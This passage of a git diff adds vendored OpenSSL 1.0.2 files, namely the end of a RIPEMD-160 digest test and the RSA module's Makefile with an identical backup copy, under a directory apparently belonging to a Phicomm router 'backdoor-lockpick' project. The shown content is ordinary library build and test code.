+static char *test[] = {
+    "",
+    "a",
+    "abc",
+    "message digest",
+    "abcdefghijklmnopqrstuvwxyz",
+    "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
+    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
+    "12345678901234567890123456789012345678901234567890123456789012345678901234567890",
+    NULL,
+};
+
+static char *ret[] = {
+    "9c1185a5c5e9fc54612808977ee8f548b2258d31",
+    "0bdc9d2d256b3ee9daae347be6f4dc835a467ffe",
+    "8eb208f7e05d987a9b044a8e98c6b087f15a0bfc",
+    "5d0689ef49d2fae572b881b123a85ffa21595f36",
+    "f71c27109c692c1b56bbdceb5b9d2865b3708dbc",
+    "12a053384a9c0c88e405a06c27dcf49ada62eb2b",
+    "b0e20b6e3116640286ed3a87a5713079b21f5189",
+    "9b752e45573d4b39f4dbd3323cab82bf63326bfb",
+};
+
+static char *pt(unsigned char *md);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    char **P, **R;
+    char *p;
+    unsigned char md[RIPEMD160_DIGEST_LENGTH];
+
+    P = test;
+    R = ret;
+    i = 1;
+    while (*P != NULL) {
+# ifdef CHARSET_EBCDIC
+        ebcdic2ascii((char *)*P, (char *)*P, strlen((char *)*P));
+# endif
+        EVP_Digest(&(P[0][0]), strlen((char *)*P), md, NULL, EVP_ripemd160(),
+                   NULL);
+        p = pt(md);
+        if (strcmp(p, (char *)*R) != 0) {
+            printf("error calculating RIPEMD160 on '%s'\n", *P);
+            printf("got %s instead of %s\n", p, *R);
+            err++;
+        } else
+            printf("test %d ok\n", i);
+        i++;
+        R++;
+        P++;
+    }
+    EXIT(err);
+    return (0);
+}
+
+static char *pt(unsigned char *md)
+{
+    int i;
+    static char buf[80];
+
+    for (i = 0; i < RIPEMD160_DIGEST_LENGTH; i++)
+        sprintf(&(buf[i * 2]), "%02x", md[i]);
+    return (buf);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile
new file mode 100644
index 0000000..f96f6b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile
@@ -0,0 +1,291 @@
+#
+# OpenSSL/crypto/rsa/Makefile
+#
+
+DIR=	rsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=rsa_test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= rsa_eay.c rsa_gen.c rsa_lib.c rsa_sign.c rsa_saos.c rsa_err.c \
+	rsa_pk1.c rsa_ssl.c rsa_none.c rsa_oaep.c rsa_chk.c rsa_null.c \
+	rsa_pss.c rsa_x931.c rsa_asn1.c rsa_depr.c rsa_ameth.c rsa_prn.c \
+	rsa_pmeth.c rsa_crpt.c
+LIBOBJ= rsa_eay.o rsa_gen.o rsa_lib.o rsa_sign.o rsa_saos.o rsa_err.o \
+	rsa_pk1.o rsa_ssl.o rsa_none.o rsa_oaep.o rsa_chk.o rsa_null.o \
+	rsa_pss.o rsa_x931.o rsa_asn1.o rsa_depr.o rsa_ameth.o rsa_prn.o \
+	rsa_pmeth.o rsa_crpt.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rsa.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rsa_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_ameth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_ameth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_ameth.o: ../../include/openssl/cms.h ../../include/openssl/crypto.h
+rsa_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_ameth.o: ../../include/openssl/opensslconf.h
+rsa_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_ameth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_ameth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_ameth.o: ../asn1/asn1_locl.h ../cryptlib.h rsa_ameth.c
+rsa_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_asn1.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_asn1.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_asn1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_asn1.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_asn1.o: ../cryptlib.h rsa_asn1.c
+rsa_chk.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+rsa_chk.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+rsa_chk.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_chk.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_chk.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_chk.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_chk.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_chk.o: rsa_chk.c
+rsa_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_crpt.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_crpt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_crpt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_crpt.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_crpt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_crpt.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_crpt.c
+rsa_depr.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_depr.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_depr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_depr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_depr.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_depr.o: ../cryptlib.h rsa_depr.c
+rsa_eay.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_eay.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_eay.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_eay.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_eay.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_eay.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_eay.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_eay.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_eay.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_eay.c
+rsa_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+rsa_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+rsa_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rsa_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+rsa_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_err.o: ../../include/openssl/symhacks.h rsa_err.c
+rsa_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_gen.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_gen.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_gen.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_gen.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_gen.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_gen.o: ../cryptlib.h rsa_gen.c
+rsa_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_lib.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_lib.c
+rsa_none.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_none.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_none.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_none.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_none.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_none.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_none.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_none.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_none.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_none.c
+rsa_null.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_null.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_null.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_null.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_null.c
+rsa_oaep.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_oaep.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_oaep.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_oaep.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_oaep.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_oaep.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_oaep.o: ../../include/openssl/opensslconf.h
+rsa_oaep.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_oaep.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_oaep.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_oaep.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_oaep.o: ../constant_time_locl.h ../cryptlib.h rsa_oaep.c
+rsa_pk1.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pk1.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_pk1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_pk1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_pk1.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_pk1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_pk1.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_pk1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_pk1.o: ../../include/openssl/symhacks.h ../constant_time_locl.h
+rsa_pk1.o: ../cryptlib.h rsa_pk1.c
+rsa_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_pmeth.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+rsa_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_pmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_pmeth.o: ../../include/openssl/objects.h
+rsa_pmeth.o: ../../include/openssl/opensslconf.h
+rsa_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_pmeth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_pmeth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_pmeth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_pmeth.o: ../../include/openssl/x509v3.h ../cryptlib.h ../evp/evp_locl.h
+rsa_pmeth.o: rsa_locl.h rsa_pmeth.c
+rsa_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_prn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+rsa_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_prn.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_prn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_prn.o: ../cryptlib.h rsa_prn.c
+rsa_pss.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_pss.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_pss.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_pss.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_pss.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_pss.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_pss.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rsa_pss.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rsa_pss.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_pss.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+rsa_pss.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_pss.c
+rsa_saos.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_saos.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_saos.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_saos.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_saos.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_saos.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_saos.o: ../../include/openssl/opensslconf.h
+rsa_saos.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_saos.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_saos.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_saos.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_saos.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_saos.o: ../cryptlib.h rsa_saos.c
+rsa_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_sign.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_sign.o: ../../include/openssl/opensslconf.h
+rsa_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_sign.o: ../cryptlib.h rsa_locl.h rsa_sign.c
+rsa_ssl.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_ssl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_ssl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_ssl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_ssl.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_ssl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_ssl.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_ssl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_ssl.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_ssl.c
+rsa_x931.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_x931.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_x931.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_x931.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_x931.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_x931.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_x931.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_x931.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_x931.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_x931.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_x931.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.bak
new file mode 100644
index 0000000..f96f6b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/Makefile.bak
@@ -0,0 +1,291 @@
+#
+# OpenSSL/crypto/rsa/Makefile
+#
+
+DIR=	rsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=rsa_test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= rsa_eay.c rsa_gen.c rsa_lib.c rsa_sign.c rsa_saos.c rsa_err.c \
+	rsa_pk1.c rsa_ssl.c rsa_none.c rsa_oaep.c rsa_chk.c rsa_null.c \
+	rsa_pss.c rsa_x931.c rsa_asn1.c rsa_depr.c rsa_ameth.c rsa_prn.c \
+	rsa_pmeth.c rsa_crpt.c
+LIBOBJ= rsa_eay.o rsa_gen.o rsa_lib.o rsa_sign.o rsa_saos.o rsa_err.o \
+	rsa_pk1.o rsa_ssl.o rsa_none.o rsa_oaep.o rsa_chk.o rsa_null.o \
+	rsa_pss.o rsa_x931.o rsa_asn1.o rsa_depr.o rsa_ameth.o rsa_prn.o \
+	rsa_pmeth.o rsa_crpt.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rsa.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rsa_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_ameth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_ameth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_ameth.o: ../../include/openssl/cms.h ../../include/openssl/crypto.h
+rsa_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+rsa_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+rsa_ameth.o: ../../include/openssl/opensslconf.h
+rsa_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_ameth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_ameth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_ameth.o: ../asn1/asn1_locl.h ../cryptlib.h rsa_ameth.c
+rsa_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+rsa_asn1.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+rsa_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_asn1.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+rsa_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+rsa_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+rsa_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+rsa_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+rsa_asn1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_asn1.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+rsa_asn1.o: ../cryptlib.h rsa_asn1.c
+rsa_chk.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+rsa_chk.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+rsa_chk.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_chk.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_chk.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_chk.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_chk.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_chk.o: rsa_chk.c
+rsa_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_crpt.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_crpt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_crpt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_crpt.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_crpt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_crpt.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_crpt.c
+rsa_depr.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_depr.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_depr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_depr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_depr.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+rsa_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rsa_depr.o: ../cryptlib.h rsa_depr.c
+rsa_eay.o: ../../e_os.h ../../include/openssl/asn1.h
+rsa_eay.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+rsa_eay.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rsa_eay.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rsa_eay.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rsa_eay.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rsa_eay.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_eay.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_eay.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_eay.c
+rsa_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+rsa_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rsa_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+rsa_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rsa_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+rsa_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
